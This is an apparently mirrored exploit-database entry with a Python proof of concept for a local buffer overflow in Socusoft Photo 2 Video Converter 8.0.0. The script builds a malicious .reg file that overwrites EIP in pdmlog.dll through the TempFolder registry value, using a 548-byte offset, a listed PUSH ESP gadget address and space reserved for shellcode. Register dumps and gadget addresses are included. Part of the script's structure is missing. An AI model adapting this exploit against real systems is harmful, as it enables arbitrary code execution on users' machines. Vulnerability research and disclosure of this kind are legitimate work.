Socusoft Photo 2 Video Converter 8.0.0 – Local Buffer Overflow

  • 作者: ret2eax
    日期: 2017-12-01
  • 类别:
  • 来源:
  • # Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow (Free and Professional variants) 
    # Date: 01/12/2017
    # Exploit Author: Jason Magic (ret2eax)
    # Vendor Homepage:
    # Version: 8.0.0
    # Tested on: Windows Server 2008 R2
    # Socusoft's Photo 2 Video Converter v8.0.0 (Free and Professional variants) 
    # contains a local buffer overflow condition in the pdmlog.dll library. 
    # Exploitation can result in register rewrites to control program execution 
    # flow, therefore, resulting in the ability to execute arbitrary shellcode leading 
    # to complete system compromise.
    # Import generated .reg prior to restarting the executable within a debugger
    #The following PUSH ESP, RETN instruction sequence addresses are suitable to 
    #redirect program execution:
    #	0x10002352 push esp; ret
    #	0x10013945 push esp; retn 0x0004
    #	0x1004cb83 push esp; retn 0x0008
    #	0x1004cbb8 push esp; retn 0x0008
    #	0x1004cc11 push esp; retn 0x0008
    # EAX 42424242
    # ECX 0002BF3B pdmlog.<ModuleEntryPoint>
    # EDX 00020000 pdmlog.00020000
    # EBX 00020000 pdmlog.00020000
    # ESP 035BFB90
    # EBP 035BFBAC
    # ESI 00000002
    # EDI 00000000
    # EIP 42424242
    # EAX 10013945 DVDPhoto.10013945
    # ECX 0002BF3B pdmlog.<ModuleEntryPoint>
    # EDX 00020000 pdmlog.00020000
    # EBX 00020000 pdmlog.00020000
    # ESP 03A0FB90
    # EBP 03A0FBAC
    # ESI 00000002
    # EDI 00000000
    # EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10' 
    # outfile
    file = "proof-of-concept.reg"
    # register re-write
    padding = "\x41" * 548
    eipOffset = "\x45\x39\x01\x10" 	# PUSH ESP (0x10013945)
    stackRewrite = "\x43" * 400 	# Shellcode Space
    # generate exploit file containing above payload instructing EIP overwrite
    poc = "Windows Registry Editor Version 5.00\n\n"
    poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n"
    poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\""
    	print "[*] Generating exploit contents...\n";
    	print "[*] Creating payload file...\n";
    	writeFile = open (file, "w")
    	writeFile.write( poc )
    	print "[*] Success!";
    	print "[!] ERROR!";